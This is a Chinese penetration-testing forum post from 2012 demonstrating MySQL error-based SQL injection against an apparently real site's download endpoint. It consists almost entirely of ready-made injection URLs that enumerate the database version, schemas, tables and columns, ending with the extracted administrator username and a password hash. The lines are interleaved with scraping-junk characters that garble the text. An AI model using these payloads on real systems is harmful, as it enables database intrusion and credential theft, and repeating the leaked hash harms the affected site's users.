找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 php+mysql高级爆错注入经测算有效
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 1985|回复: 0
打印 上一主题 下一主题

php+mysql高级爆错注入经测算有效

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-9-13 17:52:09 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
http://www.wooyun.org/bugs/wooyun-2010-01666; q& _. T1 i! l; I. o! W& a$ c
# g; N+ \+ j( N- a* K
之前想找个测试 没想到这有 可以测试下做个记录而已
2 _* \% {2 o; E" {" I$ u
- \6 z0 H6 C7 A( Vhttp://xxoo/download/downpage/netarea/id/1600003'+and+(select+1+from(select+count(*),concat(0x7c,(select+(Select+version())+from+information_schema.tables+limit+0,1),0x7c,floor(rand(0)*2))x+from+information_schema.tables+group+by+x+limit+0,1)a)%23/wapc/5000_0005_003* Z1 d' Q4 Z$ q- y

  v$ Y  f& ~) i& \& ]5 v3 a/data0/htdocs/leqi_new/app/myapp.php# ?7 P! t$ n% X& K) r, U

0 e# |( q) m/ o 或者
3 W1 ~2 O, y0 X5 T" |/ c- T' j, O- [% o& Y" c& P9 ?6 d! o0 p
/**********version()**********/ 5.1.49-log' K% @$ z$ v+ }5 O: z8 a% z
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+version()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
4 n- i- X2 a: O- p' o: g. f0 Y& K" K' I* [% s
/**********user()**********/  9 u% ]5 D$ y  T7 S1 v6 R
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
! b3 {, V( d  q# y: s" ~$ e) R/ O- T8 x
/**********database()**********/  leqi4 C. Y) j8 f" R9 T9 b; U
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+database()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
; H# ?' Y! K: E0 ]" F
! r4 P1 }0 o: L( `/**********limit依次递归爆库**********/
5 r1 a% V7 t# g: B0 \http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
. z  L, {3 `  E- f, dinformation_schema
& g: d/ s) Y0 I  ohttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
! p- Y" `* {2 g) R5 D! {& k& pleqi/ O+ ]4 q/ R6 b. B/ t0 k
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+2,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
/ ?. `3 G6 s  R3 e5 W# d$ U6 z, i5 Etest; ]2 W  q: j/ s2 n9 v% z( }

- ]7 I$ ?; D6 A/ J2 l/**********limit依次递归爆表名**********/
" R" B1 D2 N( I& fhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+table_name+from+information_schema.tables+where+table_schema=0x6C657169+limit+200,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
& n, ~: ^- V, |0 J( D+ H- Fusers! F1 ]7 s" x( l3 N7 q8 b9 V3 s
" E& h2 I, o9 S8 }2 A
/**********limit依次递归爆字段名**********/' i- {( q& y. j8 m3 F
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+column_name+from+information_schema.columns+where+table_schema=0x6C657169+and+table_name=0x7573657273+limit+3,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003- A6 l- u6 c2 g8 z) y3 J
user_id,username,nickname,passwd,group_id
6 K: g$ z$ p" [& Dhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+group_id+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
/ s* A: l- _* q/wapc/5000_0005_003
, S  ^7 k7 e/ P1 C5 W1 B11 21/ w. Q5 n, e% |- }7 c
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user_id+from+users+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23  Q* a3 u; P7 N/ U5 O& \& W2 M
/wapc/5000_0005_0035 L, E! X: W% [
11 341 351 361) _) J. d0 x( |! P/ E* w
/**********爆数据**********/% B* l+ u! [* g: H4 d
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+username+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
) J: i3 N# r1 p/ ^# V5 Padmin: e7 w: ?+ k! u! @5 y
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+passwd+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
) X8 B9 R( O7 |* v6a8b4574ca231eb8bd52764d4978ffcd9 {% |* f- B7 x. K; H7 W. t$ E
  F" |% R2 x5 d/ b
; w1 l) z+ w% B$ d3 E
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表